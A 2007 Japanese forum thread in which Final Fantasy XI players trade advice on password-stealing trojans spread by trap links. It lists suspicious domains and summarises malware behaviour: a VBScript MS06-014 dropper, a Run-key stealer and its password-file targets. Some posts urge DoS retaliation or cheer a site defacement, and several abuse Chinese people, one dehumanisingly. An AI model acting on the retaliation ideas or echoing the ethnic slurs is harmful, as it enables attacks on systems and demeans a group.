全部LISTENINGなら動いてるプロセスはないという解釈でいい?


389 :既にその名前は使われています:2007/10/16(火) 12:41:10.05 ID:aRHTNwgl
ブログに法輪孔や天安門みたいな向こうで検索かけたらしょっ引かれるような
キーワード置いておくとか、寧ろ向こうからのアクセスのみその手のサイトに自動的に飛ばすとか

そういうの意味無い?


390 :既にその名前は使われています:2007/10/16(火) 12:43:01.22 ID:3g2P8RZU
ESTABULISHERないんだけどどうすればいい?


391 :既にその名前は使われています:2007/10/16(火) 12:48:14.29 ID:7lOzvimz
>>386
別に恥ずかしくないけどな


392 :既にその名前は使われています:2007/10/16(火) 12:52:34.31 ID:fuv7QfAB
ESTABLISHEDがないなら取り合えず勝手に接続してるのは
ないと思っていいかな。大抵スタートアップに組み込まれたりして
常時送り続けるからトロイにかかってればES~ってだされてるはず

netstat -an のがわかりやすいかも?


393 :既にその名前は使われています:2007/10/16(火) 12:57:15.90 ID:yhgaGjN0
-anのほうが分かりやすいね


394 :既にその名前は使われています:2007/10/16(火) 13:20:11.87 ID:Uor/OgYr
こうなったら「天安門」「自治」「台湾独立」とかで
対抗するしかないのか
FFブログの人はみんな天安門とか書いとけば
中華本国からの接続はしてこないだろうな

問題は、日本国内に潜伏してる中華人が
書き込みしてるってとこなんだが・・・



395 :既にその名前は使われています:2007/10/16(火) 13:23:53.12 ID:gvsM/B5G
クソエニは大惨事にならんとわからないらしいな
さっさとゲーム内でも告知しろよw


396 :既にその名前は使われています:2007/10/16(火) 13:34:46.75 ID:D4aUEWzJ
ファイヤーウォール入れとけば良いジャマイカ


397 :既にその名前は使われています:2007/10/16(火) 13:36:17.66 ID:yhgaGjN0
>>394
あくまでもインターネットの治安維持の線で攻めた方が良いと思う
中国人だけとは限らない。何人とは言わないが。


398 :既にその名前は使われています:2007/10/16(火) 13:38:32.89 ID:mMDTO5JL
キムタク「俺のファイファンキャラが中国人にハッキングされて消されたんですよ;;■eは何の保障もしてくれず、、、」
こんな展開キボンヌw


399 :既にその名前は使われています:2007/10/16(火) 13:41:39.60 ID:GC85tEC3
応答するポートを利用しているアプリケーションを表示してくれるツール (一応定番で有名どころ)

Fport:ttp://www.foundstone.com/us/resources/proddesc/fport.htm

※ コマンドラインツールなので、ダブルクリックしてウィンドウが一瞬で閉じたからといってびっくりしないようにw
  (GUIベースの別のツールもあったけど忘れた(^-^;


400 :既にその名前は使われています:2007/10/16(火) 13:42:07.11 ID:fMmtES/S
いまどきキムタクてwwwww


401 :既にその名前は使われています:2007/10/16(火) 13:44:00.42 ID:JQLMBzWC
>>386
不正アクセスに関する限り、プレイヤーは被害者になれないから大丈夫だ


402 :既にその名前は使われています:2007/10/16(火) 13:46:29.47 ID:sMhtQxHn
キムタクが被害にあったらマスコミやジャニーズが黙ってないだろ


403 :既にその名前は使われています:2007/10/16(火) 13:49:56.65 ID:YdTlPzm+
じっさい被害にあった奴いるの?


404 :既にその名前は使われています:2007/10/16(火) 13:58:36.29 ID:UbZsJp7G
dos攻撃で反撃できないもんかね


405 :既にその名前は使われています:2007/10/16(火) 14:08:27.17 ID:O2qKzj6+
しかし、中国ってどこまでも終わってるよなぁ
FFで必死に活動する業者や、ニュースなどで中国のパクリモノ見たりすると、
ほんと日本に生まれて良かったと思う。


406 :既にその名前は使われています:2007/10/16(火) 14:10:18.26 ID:g977yZmM
俺も日本人でよかったと思う


407 :既にその名前は使われています:2007/10/16(火) 14:13:32.02 ID:zu1PJ9rz
>>394
「天安門」「自治」「台湾独立」とか書いとく場所はどこら辺がいいんだ
htmlの<title>あたりに書いとけばシナ共産党が接続遮断してくれるのか?w
接続を強制遮断する共産党にとってのNGワードリストなどあると助かるな


408 :既にその名前は使われています:2007/10/16(火) 14:15:30.73 ID:2VZnE/L3
以前にこんな罠サイト騒ぎがあったときは神が降臨して中華のHP書き換えまくってたな
中華が復旧したあとすぐに「そうはいかんざき」の写真に書き換えてたのはワロタ


409 :既にその名前は使われています:2007/10/16(火) 14:46:35.74 ID:cHZ+9+L6
あまり詳しくないのでもし分かる人がいたら教えてほしいです。

>>385 にあるチェックをしてみて
ESTABLISHED の箇所が自分のIPじゃなかったので検索したら
% [whois.apnic.net node-1] って出て、apnic.net のURLも記載されてかたら
上に紹介されてた aguse.net で調べてみたら中国だった

コメ欄からアドレス踏んだ覚えないし、FF系のwikiも見てないんだけど
やっぱりこれ感染してるんだろうか orz

さっきウィルスバスターでスキャンしたら出なかったんだけどな…




410 :既にその名前は使われています:2007/10/16(火) 14:56:48.83 ID:qKbbKty6
>>407
表示では規制されないんじゃなかったか
それで良いならFF11で「天安門事件凄惨」とか適当なシャウトで
奴ら業者はしょっ引かれて消えるハズ

パスワードを任意の日本語+数字可能にしてもらい「天安門事件反対123456」みたいなので
入力時に公安に逮捕させる くらいか


411 :既にその名前は使われています:2007/10/16(火) 15:02:31.26 ID:ur0bgfcq
報復といったらこの事実を広める事くらいか
といっても「FFのパスが~」なんて言っても相手にされないから「個人のブログにウイルス感染するアドレスを書き込んでいる集団がいる」というのと「そいつらは中国人だった」という事実を広めてみてはどうだろうか?


412 :空気コテ ◆AIR..o0rvE :2007/10/16(火) 15:13:24.74 ID:l6Djc+Ck
最近の罠サイト誘導のカキコは、国内のふつーのプロバイダからなので、
天安門とか書いても意味ない感じ。
ODNとかおおいです。



413 :既にその名前は使われています:2007/10/16(火) 15:16:38.53 ID:1JkHR226
>>412
それ書き込みスクリプト埋め込まれた
一般人が吐き出してるんじゃないかな?


414 :既にその名前は使われています:2007/10/16(火) 15:19:55.38 ID:7Oi8L5nd
素人なのですが、
>>385にあるチェックを試してみたら変なアドレスが引っかかりました。

http://whois.ansi.co.jp/?key=127.0.0.1
http://whois.ansi.co.jp/?key=192.168.0.2

アメリカの会社みたいなのですがそんな所に接続した事無いしとても不安です。
詳しい方、いらっしゃいましたら教えてください。


415 :空気コテ ◆AIR..o0rvE :2007/10/16(火) 15:20:42.98 ID:l6Djc+Ck
>>413
その可能性もありますね。
あと、open串では無かったです。


416 :既にその名前は使われています:2007/10/16(火) 15:22:03.16 ID:KAievkKe
>>410
ブログの確認キーを台湾独立とかにすればいいのかww
つうか、ああいう確認キーって任意に設定できたかな・・・


417 :空気コテ ◆AIR..o0rvE :2007/10/16(火) 15:22:12.46 ID:l6Djc+Ck
>>414は凄腕の釣士


418 :既にその名前は使われています:2007/10/16(火) 15:30:38.21 ID:KAievkKe
つうか、FFのログインパスをピンインで天安門とかを含む文字列にすればいいんじゃね?
含むだけでそれそのものじゃなければ、他の部分の推測は出来ないだろうし、
心配なら16桁ぐらいのパスワードにすればよくね?


419 :既にその名前は使われています:2007/10/16(火) 15:34:01.26 ID:F7hPVB4T
>>414
釣りだよな……?

127.0.0.1 自分自身
10.0.0.0~10.255.255.255 ローカル・クラスA
172.16.0.0~172.31.255.255 ローカル・クラスB
192.168.0.0~192.168.255.255 ローカル・クラスC

市販ルータはデフォルトでローカル・クラスCのどこか使っているのが多いよね。


420 :既にその名前は使われています:2007/10/16(火) 15:34:11.60 ID:fNQZG82q
>>408
2年前のちょうど今頃だっけ
懐かしいなw


421 :既にその名前は使われています:2007/10/16(火) 15:37:13.05 ID:aHjCVq+6
FF専用マシンにして、ブラウザ開かないってことになると、
もはやPCである必要なくなるな。
X箱買ったほうがいいような気がする。


422 :既にその名前は使われています:2007/10/16(火) 15:46:19.43 ID:KAievkKe
>>421
箱はA、Bボタンの位置がな・・・


423 :既にその名前は使われています:2007/10/16(火) 15:46:23.59 ID:fNQZG82q
オレも見てたがその時のネ実住民の動き

5分で読める、まとまっていないまとめ
「花と雫FF11情報局」、Overtureの審査を通過し広告が出る。
稼動、トロイ埋め込み、広告掲載の日時は不明。7月頃と推測されている。
(それなりの月日が経過)
10/21(金)
 1 20:56 1氏、スレ立て。AntiVirで検知。住民は宣伝かと疑う。
17 21:20 17氏、Avast!で検知。住民はまだ半信半疑。
24 21:30 1氏、AntiVirとAvast!で検知するとまとめる。以降テンプレ化。
32 22:41 1氏、中華業者によるトロイとの推測を提示。
   ノートンやバスターで反応なしと書いた数名が犠牲に。
39 22:59 39氏、svchostを解析し、トロイと断定。
10/22(土)
74 00:56 74氏、スクエニに通報。
114 02:54 74氏、まとめる。
-117
139 04:39 74氏にスクエニから定型メール返信。


424 :既にその名前は使われています:2007/10/16(火) 15:47:04.17 ID:fNQZG82q
184 12:15 1氏、まとめる。
-189
--- 12:31 肉氏のblog「ばなな.com」に載る。情報が2chの外に広がることに。
276 15:07 276氏、WindowsXPSP2で踏み、デジタル署名で笑う。
316 18:26 316氏、ハカーを中国人IcyFoxと推測。
-319
10/23(日)
436 03:26 436氏、踏む。素人とのことで悪戦苦闘する。
445 04:49 39氏、再度まとめる。
-449
--- 10:35 肉氏、プレミアサイト「FF11Gameinside」のフォーラムに投稿する。
519 11:57 436氏、よん? 猫モでもわかるようにまとめる。
531 12:21 リネージュでは以前から同様のトロイが多数あったことが判明してくる。
-578
580 14:16 580氏、初心者向けにまとめる。
-581



425 :既にその名前は使われています:2007/10/16(火) 15:47:35.55 ID:fNQZG82q
693 19:09 660氏、サイトを赤い画面に書き換える。ファイルも消される。
797 21:08 797氏、広告費のためのうっかりクリックを提案。みんなうっかりする。
806 21:17 サイトの赤い画面に日本語の解説が載る。
876 22:33 876氏、ニュース速報にスレ立て。
10/24(月)
927 00:07 サイトが白い画面「ぽこたんインしたお!」に書き換わる。
 1 02:24 スレ立て。
 7 02:16 7氏、まとめる。
-18
22 02:36 22氏、まとめる。



426 :既にその名前は使われています:2007/10/16(火) 15:48:04.77 ID:fNQZG82q
--- 09:00? サイトが復活する。
--- 10:00? サイトが再度「あ、ぽこたんインしたお!」に書き換わる。
--- 11:00? サイト消される。。
304 16:00 304氏、トロイを逆アセンブルして詳細に解析。
311 16:25 サイトが復活する。
357 17:00 357氏、トロイが新バージョンであることを突き止める。
366 17:12 サイトが「そうはいかんざき!」に書き換わる。
375 17:21 サイト消される。
401 17:52 中華(IcyFox?)が話し合いの申し入れ。ファイル「japan hack read.txt」
 hellow i will talk with you wlmx009@hotmail.com
403 17:55 話し合い拒否? 中華がキれる。ファイル「fcuk you japan.txt」
 hellow i will talk with you wlmx009@hotmail.com
 yes or no??? your msn??
448 18:24 サイトが無害化し復活。以下丸1日無害(Overtureの審査待ち?)。



427 :既にその名前は使われています:2007/10/16(火) 15:48:48.96 ID:fNQZG82q
10/25(火)
840 17:26 サイトにトロイが仕込まれる。
849 17:43 849氏、トロイが新バージョンであることを突き止める。
859 18:47 859氏、ファイアウォールでの遮断ホストをまとめる。
882 19:22 バスターが対応。
935 22:20 ノートンも対応。
955 22:58 955氏、各社対応をまとめる。



428 :既にその名前は使われています:2007/10/16(火) 15:49:20.05 ID:CzgANJHf
>401 17:52 中華(IcyFox?)が話し合いの申し入れ。ファイル「japan hack read.txt」
> hellow i will talk with you wlmx009@hotmail.com
>403 17:55 話し合い拒否? 中華がキれる。ファイル「fcuk you japan.txt」
ワロタwwww


429 :既にその名前は使われています:2007/10/16(火) 15:49:29.79 ID:fNQZG82q
124 名前:既にその名前は使われています投稿日:2005/10/26(水) 19:12:22 ID:kV+oZrGE
今回のカラクリをおさらい

       RMT業者

         ↑アカウント売買

    中華の罠サイト → 個人情報売買 → 中華マ○ィア

         ↓個人情報売買            ↓金持ちの情報

     日本の闇組織       ⇔       誘拐組織
                    闇取引

         ■e ('A`)?



430 :既にその名前は使われています:2007/10/16(火) 16:15:01.27 ID:GC85tEC3
>>371
かなり遅レススマソ
とりあえず、そこは 2006/04 にパッチが出た脆弱性を利用しているので
Windows Up Date してあれば感染しないと思われ( Ms06014.htm と同種 )
"C:\WINDOWS\SYSTEM32\" に "SVCH0ST.EXE" もしくは "SVCHOST.VBS" が
存在する場合は感染を疑ったほうがいいかも
(SVCH0ST.EXE は "O(オー)" でなく "0(ゼロ)" なので注意。"O(オー)"は、はじめから存在する)

MS06-014:ttp://www.microsoft.com/japan/technet/security/Bulletin/MS06-014.mspx

<詳細>
sanffm_htm の中身は Vbscript で書かれたソースを " or 0x80" で難読化させてる
US-ASCII なのはそのため ("and 0x7f" で綺麗なソースになるよ)
Vbscript を読むと、MS06-014 (2006/04) の脆弱性をついて www_6828teacup_com/sanf11_exe を
%SYSTEMROOT%\SYSTEM32\SVCH0ST.EXE と SVCHOST.VBS で保存しようとしているぽい
※ このまま全部を信じないでください。詳しい方添削おながいします。

>>空気コテ、ソースサンクス


431 :既にその名前は使われています:2007/10/16(火) 16:17:15.63 ID:wduCnpq6
まとめサイト作ってくれる神はいないのだろうか
(wikiだと改竄されるからホームページで)


432 :既にその名前は使われています:2007/10/16(火) 16:31:49.07 ID:KAievkKe
やばそうなサイトリスト
tp://www■blogplaync■com/
tp://www■xiaoriben■net/
tp://mbspro6uic■com/
tp://tinyurl■com/
tp://www■sakerver■com/
tp://www■k5dionne■com/
tp://www■teamerblog■com/
tp://www■articlelin■com/
tp://www■panslog■net/
tp://www■wikifdjary■net/
tp://www■euphidime■com
tp://www■angelfire.com■/
tp://ff11link■blog122■fc2■com


433 :既にその名前は使われています:2007/10/16(火) 16:53:20.51 ID:fuv7QfAB
>>409
再起動して常駐とか外してもそこ繋げてる?



434 :既にその名前は使われています:2007/10/16(火) 16:59:16.99 ID:1JkHR226
>>432のアドをNGに叩き込むとかできないのかな?


435 :既にその名前は使われています:2007/10/16(火) 17:08:27.77 ID:4DvfQKCa
>>434
FireWall系のソフトを使うか>>373の方法でローカルに向けちゃえば
実質アクセスされなくなる

まぁhostsだと検知できないがな




436 :既にその名前は使われています:2007/10/16(火) 17:11:22.24 ID:GC85tEC3
>>434
例えばIEの場合
[ツール]→[インターネットオプション]→[セキュリティ]→[制限付サイト]→[サイト]
で各サイトを登録すると、リストに追加されたサイトのみに適用させるセキュリティ設定がカスタマイズできるよ
(デフォルトで、Javascript、ActiveX等の全ての動作を禁止している)

IEに新たな脆弱性が0dayとかで出たら対応できない可能性もあるけど、
設定すれば安全性はかなり高まる


437 :既にその名前は使われています:2007/10/16(火) 17:24:56.46 ID:3g2P8RZU
>>392
遅レスながら、ありがとにゃん


438 :既にその名前は使われています:2007/10/16(火) 17:25:18.76 ID:KckLGoqC
中国の検閲システム金盾は、あらゆる中国用検索エンジンで
タブーワードが検索結果に載らないというだけで
海外の検索エンジンを経由すれば普通に載る。
だから自分のサイトにタブーワード埋め込むとか無意味。


439 :既にその名前は使われています:2007/10/16(火) 17:37:23.98 ID:TBFr8om6
>>438
タブーワード発信に関してはどうなの?
タブーワードを忘れ発信しなければアクセス出来ない場合、奴らはどういう行動に出ると予測される?


440 :既にその名前は使われています:2007/10/16(火) 17:39:10.05 ID:UbZsJp7G
牛や豚を人間の都合で殺しても許されるんだから
牛豚を同じ家畜である中国人に置き換えても、成立するはずなのだが。


441 :既にその名前は使われています:2007/10/16(火) 17:50:28.97 ID:bfPe6BNS
>>279
亀だがそれどうやって設定すんだ?


442 :既にその名前は使われています:2007/10/16(火) 17:51:29.41 ID:cWYi7sAN
例えばさ、POLのIDをシナ語で「台湾独立万歳」、
パスワードを「打倒中国共産党」とか「中国共産党幹部汚職」とかしたら
あいつら送信できるもんか?


443 :既にその名前は使われています:2007/10/16(火) 18:09:07.33 ID:H+JYkYw8
とりあえず>>432のURLをうちのブログの禁止ワードに全部ぶっこんだ。
どんどんぶっこむぜー


444 :既にその名前は使われています:2007/10/16(火) 18:16:11.02 ID:gi39A9Yk
>>385
ESTABLISHEDが2つあって自分と自分を繋いでる・・・
これは何だろう・・・?


445 :既にその名前は使われています:2007/10/16(火) 18:19:00.08 ID:gi39A9Yk
>>443
>>359のリネージュ資料室にあるのを全部ぶち込んでみたらどうだろう?


446 :既にその名前は使われています:2007/10/16(火) 18:20:03.00 ID:AdRLUbdG
フジでメイドインチャイナwwww


447 :既にその名前は使われています:2007/10/16(火) 18:32:54.18 ID:jK91TK3A
携帯でF5アタックだな


448 :既にその名前は使われています:2007/10/16(火) 18:56:11.19 ID:8zyeJfQG
・PS2やXBOX360で遊ぶび、FFをプレイするPCでネットサーフィンしない
・漫画喫茶やインターネットカフェなど他人のPCやゲーム機でのログインはしない、他人にパスは教えない
・IDやパスをPC内に残さない(キーの入力情報まで読まれることがあります)
・もしするのであれば最新のウィルス駆除ソフト、スパイウェア駆除ソフトを入れてログインの前に必ずそれらを走らせる
 (無料のツールならSpybot、Ad-aware、Windows Defender、avast! Antivirus、AVG等があります)
・ウィンドウズアップデートを自動更新にし、常に最新の状態を保つ
・IE(インターネットエクスプローラー)は可能な限り使用しない(Sleipnir、Firefoxなどがあります)
・その他はIEではないタブブラウザ(Sleipnir、Firefox)を強く推奨、2chを見るなら専用ブラウザ(JaneStyle非IEコンポネ)で見る
・2ch等の掲示板や個人Blogにはられたリンクを気軽に踏まない
・JAVAアプレットはオフ、アクティブXはDL通知or拒否にしておく。
・万が一パス抜きをされた場合は運営に報告、サイバーネット課や生活安全課に相談
・個人的な対処としては対象PCの回線を切り、安全なPCやPS2などでパスを変更した後対象PCのクリーンインストールをし直す
**参考サイト**
リネージュ資料室、セキュリティ対策(基本的な知識や対策)
http://lineage.nyx.bne.jp/misc/security/
ブラウザの設定
http://www.affrc.go.jp/ja/info/kenshu/INTRO/2_browser_1.html
■aguse.net (怪しいURLを見つけたらこれでチェック)
http://www.aguse.net/
>>267のROのページは個人のものなのでとりあえず外してみました


449 :既にその名前は使われています:2007/10/16(火) 18:58:41.18 ID:8zyeJfQG
知識の無い>>28ですが簡単に纏めてみました
参考サイトのURLと文章は別にしたほうが良いと思われます


450 :既にその名前は使われています:2007/10/16(火) 19:06:00.52 ID:8zyeJfQG
一行目が遊ぶびになってる('A`)



451 :既にその名前は使われています:2007/10/16(火) 19:08:35.85 ID:P4r7otkH
専ブラはJane Doe Styleを使ってるけど、これって非IEコンポーネントなんですか?
もし設定でそう変更できるならその方法を教えてもらえませんか。ざっと設定を
みたんですが、どこで変更するのかがよくわからないのです。


452 :既にその名前は使われています:2007/10/16(火) 19:14:14.91 ID:ipMxB3zO
メモ帳から 手打ちで作ったhtml
内容 ソースはぐだぐだ。
ttp://tora.nomaki.jp/
トップディレクトリにzipもいれてるから
こんなでよければ もってって好きに使って


453 :既にその名前は使われています:2007/10/16(火) 19:16:49.78 ID:BEe0FeaJ
RO関係のまとめサイト。
下はジョブwikiだけど「安全の為に」の項目が充実してる。

ROアカウントハック対策スレのまとめサイト
ttp://sky.geocities.jp/vs_ro_hack/

BS-template
ttp://smith.rowiki.jp/


454 :既にその名前は使われています:2007/10/16(火) 19:17:56.82 ID:cHZ+9+L6
>>433
>>409です。常駐を全てはずして netstat -an でまた見ても
409に書いたのと同じ状態でした。
ただ>>414を見て気になったのが、ESTABLISHED の行に書かれてるアドレスが 127.0.0.1 でした。

通常「あなたのIPアドレス」として提示される数字と違うので
この127.0.0.1をIP検索にかけたら % [whois.apnic.net node-1] と結果が出て、
apnic.net を調べたら中国だったので不安になったわけです。

ググってみたら127.0.0.1はローカルホストの事だと書いてあり
何だか余計に分からなくなってきてます。
尚、ESTABLISHED はこんな感じで2行ありました

127.0.0.1:△△ 127.0.0.1:○○ ESTABLISHED
127.0.0.1:○○ 127.0.0.1:△△ ESTABLISHED

素人まるだしの教えてくんですみません。スレチだったら他にいきます。


455 :既にその名前は使われています:2007/10/16(火) 19:22:11.09 ID:VfEIvFw9
>>454
そのネタはもういい


456 :既にその名前は使われています:2007/10/16(火) 19:25:26.76 ID:cHZ+9+L6
ごめんなさい
他のスレを探してみます


457 :既にその名前は使われています:2007/10/16(火) 19:26:38.71 ID:LEj/PaN1
>>454
127.0.0.1:1025 という表示ではないだろうか
http://itpro.nikkeibp.co.jp/article/NEWS/20051217/226406/
>ワームに感染するとパスワードなどを盗まれる恐れがある。


458 :既にその名前は使われています:2007/10/16(火) 19:38:27.04 ID:KckLGoqC
>>442
送信は出来る。ただし検閲が入っているから
それ以降自分の活動が中国当局にマークされる可能性はある。


459 :既にその名前は使われています:2007/10/16(火) 20:06:42.81 ID:a9ULkNvd
以前から言われているけどFFXIAHから飛べるRMTサイトもかなり危険だから注意
うっかりクリックしてる人結構多いんじゃないかな


460 :既にその名前は使われています:2007/10/16(火) 20:41:33.98 ID:czM5847H
>>453が怖くて見れない><


461 :既にその名前は使われています:2007/10/16(火) 20:46:01.96 ID:NuP6ZCoJ
最新のノートンでウイルス0だったら大丈夫なのかな?
踏んだけど即回線引っこ抜きチェック走らせた
踏んだ直後と昨日寝る前に二度
あと今朝一度

パスは知人のPCで変えたし、知人のPCでインしたところ侵入はまだされていないみたい
PCこれしかないのに恐くてインできない…

神兵がでなければこれを契機にやめちゃうんだけどな


462 :既にその名前は使われています:2007/10/16(火) 20:59:28.85 ID:5DTfD3A6
>>461
不安ならこれがすべてだって。
対象PCの回線を切り、安全なPCやPS2などでパスを変更した後対象PCのクリーンインストールをし直す。
面倒だしその日はそのPC使えないかもしれないけど、クリーンインストールしとくべき。
たったそれだけの事を怠って、抜かれたらアホらしいでしょ。


463 :既にその名前は使われています:2007/10/16(火) 21:07:39.83 ID:fuv7QfAB
>>454
TCP  0.0.0.0:△△      0.0.0.0:0       LISTENING
TCP  0.0.0.0:○○      0.0.0.0:0       LISTENING
こんなの上にでてるでしょ。
特に問題のないことだから気にしないでいいとおもう


464 :既にその名前は使われています:2007/10/16(火) 22:14:15.45 ID:gi39A9Yk
IEのセキュリティレベルを高にしてwiki見たら画面真っ白で焦ったwww
まあ、xmlで書かれているし何も表示されなくなって当然か・・・


465 :既にその名前は使われています:2007/10/16(火) 22:25:03.67 ID:NuP6ZCoJ
>>461
ありがとうございます
家に帰ったら早速クリーンインストールしてみます


466 :既にその名前は使われています:2007/10/16(火) 22:35:12.59 ID:hJRBS4Zx
>>394
国内は不正アクセスで牢屋に突っ込めます

踏み台にされたら知らんがw


467 :既にその名前は使われています:2007/10/16(火) 23:01:02.89 ID:gi39A9Yk
>>466
奴らは強制送還されれば死刑ほぼ確定らしいな


468 :既にその名前は使われています:2007/10/17(水) 00:03:29.28 ID:cWYi7sAN
>>458
じゃまるっきり無駄ってわけでもないのな


469 :既にその名前は使われています:2007/10/17(水) 00:07:27.89 ID:Uor/OgYr
外貨獲得の手段として推奨されそうですね^^;


470 :既にその名前は使われています:2007/10/17(水) 00:24:02.84 ID:zhMHKG2x
ミクシィでちょろっとFF11の事書くだけで
意味不明なコメント残して行ったやつがいた
こんなかんじ

「あの時のタフさはさすがナイトってかんじでしたね

 そんな僕は冥王のピアスを2個かってご満悦です
 http://ほにゃららほにゃらら           」

ってやつ

たぶん噂のパス抜きサイトかと思ったんで速攻削除した FF11フレもいるし・・・

他に書かれた人いる? 書いてきたやつなんか一般人っぽいんだが


471 :既にその名前は使われています:2007/10/17(水) 00:30:14.19 ID:lNqnEB4L
一般サイト管理者の名前を使って
一般サイトの文をコピペして罠を貼っていく奴がいる。
うちに来たのは中国からの接続だった。


472 :既にその名前は使われています:2007/10/17(水) 00:30:59.39 ID:s/kKytjd
コミュ『ウィンダス連邦』と『ソロな人』に新トピで怪しげなリンクがあるんだが…



473 :既にその名前は使われています:2007/10/17(水) 00:32:58.89 ID:MmFyiKAu
ゲーム内ではSTTの対策が強化されてきたからSTTの対策が及ばない外部から攻めてきたか。
金への執着心は一番だなチャイニーズ…


474 :472:2007/10/17(水) 00:44:29.64 ID:s/kKytjd
うはwwwもうミクシー退会してやがるwww
やっぱパス抜きサイトへのリンクだったか。


475 :既にその名前は使われています:2007/10/17(水) 00:45:33.51 ID:zhMHKG2x
>>472
一応警告文をどちらにも書いておいた
ちなみに聞きたいけど名前どんなやつだった?

俺に書いてきたやつももう消してた なんか名前にMとかはいってたと思う


476 :472:2007/10/17(水) 00:50:59.49 ID:s/kKytjd
『エヌP』だったかな…
うる覚えだから確かじゃないかも…


477 :475:2007/10/17(水) 00:53:15.23 ID:zhMHKG2x
>>472
あ、たぶんそれだwwww アルファベットはいってたなー てしか覚えて無かったw

ちなみにそのエヌPってやつ 普通に学生っぽかった
日記も全体公開で少なくともここ2週間分ぐらいはまともなのかいてあった
マイミクも20人ぐらい普通にいた

一体なんだったのかよくわからん 誰かに雇われてたのか?


478 :既にその名前は使われています:2007/10/17(水) 01:00:02.32 ID:t/0S/SVq
http://www.gpara.com/kaigainews/korea/2007101603.php

日本どころか、会社を組織して韓国の会社に脅迫をかけはじめたシナ畜クオリティw

>>477
どっかで罠サイトを踏んで、本人がmixiのPASSも抜かれてる事に気付かずに不正
アクセスされている可能性大。つか、今ブログとmixiで全体公開しているFF関連
の個人日記やコミュにもBOTで書き込んでいるようなので注意したほうがいい。
ちなみに奴らの活動時間は深夜2時前後みたいだから、その時間帯で不審なURLの
書き込みを見つけたら速攻削除しておいたほうがいいよ。


479 :既にその名前は使われています:2007/10/17(水) 01:00:16.93 ID:nbNUn618
見クシィの管理人に通告して辿ってもらうとかなんとかならんのかね?


480 :472:2007/10/17(水) 01:05:30.10 ID:s/kKytjd
留学生なんかな…
ミクシーはウイルスとかに疎い人が多いから各コミュの管理人さんにメッセしてコミュの説明ページに『パス抜きサイトへのリンクがトピや※にあるから不用意にリンクを踏まないで下さい』って注意喚起して貰うとよいかも。



481 :既にその名前は使われています:2007/10/17(水) 01:07:26.79 ID:nbNUn618
留学生を雇って中継基地にするくらいだし、ミクシィもってる留学生を雇ったor報酬払って招待してもらった可能性はあるだろうな


482 :既にその名前は使われています:2007/10/17(水) 01:10:00.12 ID:QlBJPGz6
ぺってんにも罠サイト張られたって管理人が警告してるね
グレーな商売で満足してりゃいいものを
下手したら国際的に裁かれるぜ


483 :472:2007/10/17(水) 01:12:59.62 ID:s/kKytjd
地道にFF関連コミュの管理人さんにメッセージを送るしかないね。
それにしてもパス抜きされて苦労して金策して買ったアイテムが取られたら少々のショックじゃないだろうな。


484 :既にその名前は使われています:2007/10/17(水) 01:31:51.05 ID:RFn/OCI3
ミクシーに関しては知ったこっちゃないw


485 :既にその名前は使われています:2007/10/17(水) 01:45:13.41 ID:TZnTtD31
mixiは運営もアテにならないしな


486 :既にその名前は使われています:2007/10/17(水) 01:46:19.31 ID:THv6+eex
オレのmixi日記にもモロにその業者がコメント残してた。
もちろんmixi側にも通報したぜ。



487 :既にその名前は使われています:2007/10/17(水) 02:14:35.64 ID:eUQyp+PG
アホな質問なのかもしれんけど
田代砲とかでこっちからなんとかすることはできないの?


488 :既にその名前は使われています:2007/10/17(水) 02:18:40.28 ID:eUQyp+PG
あと■e側の対策として
(希望者のみ)指定したIP以外からの接続をできない設定にする
とかいうのは技術的に可能なの?


489 :既にその名前は使われています:2007/10/17(水) 02:21:47.69 ID:kZ4zj/vZ
■eはまたNHKとかに取り上げられてから動くんかな


490 :既にその名前は使われています:2007/10/17(水) 02:32:11.90 ID:bnoubli5
おkwネ実はやっぱり見る価値あるわ~。

みんなエロイね。


491 :既にその名前は使われています:2007/10/17(水) 02:41:30.63 ID:fuUUsTZv
あげ


492 :既にその名前は使われています:2007/10/17(水) 02:41:53.11 ID:w2kmd88T
某SS掲示板にそれらしいのがあったけどそうかな?
jpgみたいなんだが


493 :既にその名前は使われています:2007/10/17(水) 03:23:48.60 ID:DgGSE2oO
ffzotsuとかいうjpgなら罠の一つだね


494 :既にその名前は使われています:2007/10/17(水) 03:58:12.67 ID:w2kmd88T
soreda!
jpgも油断できないのか(;´Д`)


495 :既にその名前は使われています:2007/10/17(水) 05:07:24.66 ID:bpzF6Nvu
ここ最近で身近な人が3人ほど身ぐるみ剥がされる被害にあってるな、全体でみたらすごい被害件数
になってると容易に予想できるね、自己責任とはいえ救済方法をもっと手厚くしてほしいよ



496 :既にその名前は使われています:2007/10/17(水) 06:30:18.06 ID:yGyY8X/m
289 名前:既にその名前は使われています[] 投稿日:2007/10/16(火) 18:07:13.99 ID:7/4KKOtC
mnk4.exeというのをのぞいた(今日現在、NIS2008では検出できない)。

自分自身を C:\WINDOWS\system32\explorerf.exe にコピーして、
これを、HKLM\Software\Microsoft\Windows\CurrentVersion\Run に
登録し、Windowsの起動時に常駐させる。
ざっと文字列をさらったら、こんなのが出てきた。
usr\all\login_w.bin ←POLのパスワード格納ファイルだったかな
passmem: 、binfile 、bindata1 、bindata2 、?passmem= 、
&binfile= 、&bindata= 、&firstbin=yes 、&firstbin=no ←この辺は2年前にも見た気がする
C:\temp.bin 、c:\ff12.txt 、c:\ff13.txt
66ff33mapfile 、c:\66ff33.txt
pol.exe ←やっぱりPOL
jpff11.dll ←謎
StartHook 、StopHook ←プロセスをフックしてデータ読むんかね
http://ff11ma.****.net/888.txt ←503だった

cery.exe、love1.exe、sanf11.exe、server.exe、sfdg.exe、test.exe、SEX MOVIES.exeなんかは
サイズが近いし、ばらまき方が同じだから亜種だと思う。



497 :既にその名前は使われています:2007/10/17(水) 06:30:56.02 ID:yGyY8X/m
291 名前:既にその名前は使われています[] 投稿日:2007/10/16(火) 19:06:28.09 ID:7/4KKOtC
ああ、%SYSTEMDIR%\systemlf.dll も作ってた。これはリソースに収められているDLL。

こいつらの亜種らしい。
・マカフィー
 ttp://www.mcafee.com/japan/security/virPQ2006.asp?v=PWS-FFantasy
・トレンドマイクロ
 ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_FANTASY.C&VSect=Td
 ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_AGENT.RDU&VSect=Td

NISでも実行時には検出されるのかな。検体を提出しておいたシマンテックから
「自動処理で検出できないので人力解析に回しとくよ」というメールが今来た。

取りあえず、次の2つのファイルが存在したら危険。
C:\WINDOWS\system32\explorerf.exe
C:\WINDOWS\system32\systemlf.dll

だそうだ


498 :既にその名前は使われています:2007/10/17(水) 08:20:48.62 ID:t72DLL8T
